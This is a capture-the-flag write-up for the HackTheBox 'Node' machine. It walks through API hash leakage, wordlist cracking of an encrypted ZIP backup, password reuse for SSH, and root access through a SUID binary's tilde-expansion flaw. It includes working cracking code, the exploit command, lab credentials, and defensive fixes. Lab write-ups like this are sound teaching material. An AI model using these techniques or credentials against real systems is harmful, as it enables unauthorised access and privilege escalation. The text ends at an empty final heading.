HackTheBox Medium Linux Node.js API MongoDB SUID zip2john

Node

A Node.js API exposes password hashes; an encrypted backup is crackable; MongoDB is used to pivot; a SUID binary gives root.

cat4clysm
Tools used
nmap dirb john zip2john netcat

Scanning

root@kali:~$
nmap -sC -sV -p22,3000 -Pn -n 10.10.10.58 -oN targeted
[image: nmap scan]

Port 3000 - Node.js API

root@kali:~$
dirb http://10.10.10.58:3000 -a "gaogao"
[image: dirb results: source code and API users]

At /api/users we find unsalted SHA-256 password hashes, which a plain lookup resolves instantly:

myP14ceAdm1nAcc0uNT: dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
# Cracked: manchester
[image: crackstation result]
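The lookup above, as an added example rather than code from the page: it parses a constructed copy of the /api/users response (the username and hash are the ones shown above; the _id and the five-word wordlist are made up), runs a dictionary attack against every hash at once, and then shows what the API should have stored instead, a salted and iterated PBKDF2 digest that the same wordlist cannot resolve with one hash per candidate.

```python
import hashlib
import hmac
import json
import os

# Constructed stand-in for the /api/users response. Username and hash are the ones
# found on the box; the _id is made up for the sample.
SAMPLE_API_USERS = json.dumps([
    {"_id": "000000000000000000000001", "username": "myP14ceAdm1nAcc0uNT",
     "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
     "is_admin": True},
])

# Tiny stand-in for rockyou.txt
WORDLIST = ["password", "123456", "manchester", "liverpool", "letmein"]


def extract_hashes(api_json: str) -> dict:
    """username -> hex hash, keeping only values that look like unsalted SHA-256 (64 hex chars)."""
    out = {}
    for user in json.loads(api_json):
        h = str(user.get("password", "")).lower()
        if len(h) == 64 and all(c in "0123456789abcdef" for c in h):
            out[user["username"]] = h
    return out


def crack_sha256(hashes: dict, wordlist) -> dict:
    """Dictionary attack: one SHA-256 per candidate, compared against every hash at once.
    No salt means every user sharing a password falls together, and precomputed tables work."""
    wanted = {h: u for u, h in hashes.items()}      # hash -> username
    found = {}
    for word in wordlist:
        digest = hashlib.sha256(word.encode()).hexdigest()
        if digest in wanted:
            found[wanted[digest]] = word
    return found


# What the API should have stored: a per-user random salt plus an iterated KDF.
PBKDF2_ROUNDS = 210_000


def hash_password(password: str, salt: bytes = None) -> str:
    """Return 'pbkdf2_sha256$rounds$salthex$dkhex'; a fresh salt is drawn unless one is given."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; constant-time compare."""
    _algo, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)
```

With the salted form an attacker must run the full KDF once per candidate per user, so the single-pass "one SHA-256, compare against everyone" loop in crack_sha256 no longer applies.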

Encrypted backup - Password cracking

[image: admin panel, backup download]
root@kali:~$
cat myplace.backup | base64 -d > myplace
zip2john myplace > myplace.john
john --wordlist=/usr/share/wordlists/rockyou.txt myplace.john
# password: magicword
unzip myplace
[image: MongoDB credentials in the extracted source]
mark: 5AYRft73VtFpc84k
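The decode-then-crack pipeline above, as an added example (not code from the page): it base64-decodes the backup, checks for the ZIP magic, runs a wordlist through Python's zipfile in place of zip2john/john, and pulls the mongodb:// user and password out of the extracted app.js. Because zipfile reads ZipCrypto archives but cannot write them, the block also carries a minimal ZipCrypto writer used only to construct the sample archive: a made-up app.js holding the connection string found on the box, protected with the password magicword. The entry name and the five-word wordlist are assumptions.

```python
import base64
import binascii
import io
import re
import struct
import zipfile


def decode_backup(b64_text: str) -> bytes:
    """myplace.backup is base64 text; the decoded bytes must start with the ZIP local-header magic."""
    raw = base64.b64decode(b64_text)
    if not raw.startswith(b"PK\x03\x04"):
        raise ValueError("decoded backup is not a ZIP archive")
    return raw


def crack_zip(raw: bytes, wordlist):
    """Try each candidate against every entry. A wrong password fails the 1-byte check in the
    12-byte encryption header (RuntimeError) or, about 1 time in 256, the CRC-32 of the
    extracted data (BadZipFile). Returns the first password that decrypts everything."""
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        for candidate in wordlist:
            try:
                for name in zf.namelist():
                    zf.read(name, pwd=candidate.encode())
            except (RuntimeError, zipfile.BadZipFile):
                continue
            return candidate
    return None


def find_mongo_credentials(b64_text: str, wordlist):
    """Decode, crack, then pull the mongodb:// user:password out of any app.js in the archive."""
    raw = decode_backup(b64_text)
    password = crack_zip(raw, wordlist)
    if password is None:
        return None, None
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        for name in zf.namelist():
            if name.endswith("app.js"):
                text = zf.read(name, pwd=password.encode()).decode()
                m = re.search(r"mongodb://([^:/@]+):([^@]+)@", text)
                if m:
                    return password, m.groups()
    return password, None


# ---- Everything below only builds a constructed sample archive so the code runs offline ----
# Minimal traditional PKWARE (ZipCrypto) writer per APPNOTE 6.1: one stored entry,
# 12-byte encryption header whose last byte is the high byte of the CRC (the password check).

def _crc_update(crc, byte):
    # ZipCrypto uses the raw CRC-32 table step without zlib's pre/post inversion
    return binascii.crc32(bytes([byte]), crc ^ 0xFFFFFFFF) ^ 0xFFFFFFFF


def _zipcrypto_encrypt(password: bytes, plaintext: bytes) -> bytes:
    k = [0x12345678, 0x23456789, 0x34567890]

    def update(b):
        k[0] = _crc_update(k[0], b)
        k[1] = (k[1] + (k[0] & 0xFF)) & 0xFFFFFFFF
        k[1] = (k[1] * 134775813 + 1) & 0xFFFFFFFF
        k[2] = _crc_update(k[2], k[1] >> 24)

    for b in password:
        update(b)
    out = bytearray()
    for c in plaintext:
        t = (k[2] | 2) & 0xFFFF
        out.append(c ^ (((t * (t ^ 1)) >> 8) & 0xFF))
        update(c)
    return bytes(out)


def build_encrypted_zip(name: bytes, data: bytes, password: bytes) -> bytes:
    crc = binascii.crc32(data) & 0xFFFFFFFF
    header = bytes(11) + bytes([crc >> 24])          # 11 filler bytes + password check byte
    body = _zipcrypto_encrypt(password, header + data)
    flags, method, t, d = 1, 0, 0, ((2017 - 1980) << 9) | (9 << 5) | 1   # bit 0 = encrypted; stored
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, flags, method, t, d,
                        crc, len(body), len(data), len(name), 0) + name + body
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, flags, method, t, d,
                          crc, len(body), len(data), len(name), 0, 0, 0, 0, 0, 0) + name
    end = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + end


# Constructed sample: a made-up app.js carrying the connection string found on the box,
# zipped with the password the real backup used.
SAMPLE_APP_JS = b'const url = "mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace";\n'
SAMPLE_BACKUP_B64 = base64.b64encode(
    build_encrypted_zip(b"var/www/myplace/app.js", SAMPLE_APP_JS, b"magicword")).decode()
WORDLIST = ["password", "123456", "myplace", "magicword", "letmein"]   # stand-in for rockyou.txt
```

The reason rockyou gets through so fast is visible in crack_zip: ZipCrypto's 12-byte header gives a one-byte password check, so almost every wrong candidate is rejected after decrypting 12 bytes, and the full CRC-32 only runs for the 1-in-256 false positives. An archive that matters should be protected with AES (WinZip AE-2 or an outer age/gpg layer) and a passphrase that is not in a wordlist.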

SSH + MongoDB + SUID

The MongoDB password is reused for SSH as mark, and a process running as tom points at a scheduler script that also talks to MongoDB:

root@kali:~$
ssh mark@10.10.10.58
ps aux | grep tom
[image: process list]
root@kali:~$
cat /var/scheduler/app.js
[image: /var/scheduler/app.js, MongoDB connection]

We find a SUID binary for privilege escalation. The trick: the binary hands its path argument to a shell, so a literal "~" passes any check on the argument untouched and is expanded to $HOME only afterwards; pointing HOME at /root therefore archives the root home directory:

[image: SUID binary]
root@kali:~$
export HOME=/root
backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "~"
[image: root flag]
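The tilde trick made concrete, as an added example (the backup binary's source is not on the page, so this is not it): a substring denylist is applied to the literal argument, then the argument is interpolated into a shell command, which is the pattern that lets "~" plus HOME=/root reach /root. The denylist contents are an assumption for illustration. The hardened check resolves the path with realpath, with no shell involved, and requires it to stay under an allowed directory.

```python
import os
import subprocess

# Illustrative filter only; the real binary's checks are not shown on the page.
DENYLIST = ("/root", "..")


def naive_is_allowed(arg: str) -> bool:
    """Check applied to the literal argument, before any shell sees it."""
    return not any(bad in arg for bad in DENYLIST)


def shell_expands(arg: str, home: str) -> str:
    """What a child shell (system()/popen style) turns the argument into under the given HOME.
    The argument is interpolated into the command string: this is the vulnerable pattern."""
    env = dict(os.environ, HOME=home)
    result = subprocess.run(["sh", "-c", "printf '%s' " + arg],
                            env=env, capture_output=True, text=True, check=True)
    return result.stdout


def vulnerable_backup(arg: str, home: str):
    """Filter the literal string, then hand it to a shell. Returns the path the shell
    would actually archive, or None if the filter rejected the argument."""
    if not naive_is_allowed(arg):
        return None
    return shell_expands(arg, home)


def hardened_is_allowed(arg: str, allowed_root: str) -> bool:
    """No shell: canonicalise with realpath (symlinks and .. resolved, no tilde expansion)
    and require the result to sit inside allowed_root. Pass the result to the archiver
    with an argv list, never through a shell string."""
    real = os.path.realpath(arg)
    root = os.path.realpath(allowed_root)
    return real == root or real.startswith(root + os.sep)
```

vulnerable_backup("/root", "/root") is rejected by the filter, while vulnerable_backup("~", "/root") returns "/root": the check and the shell disagree about what the argument means. hardened_is_allowed never expands "~" because realpath treats it as a file literally named "~", so the only way to reach /root is to name it, and that fails the prefix test.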

Lessons learned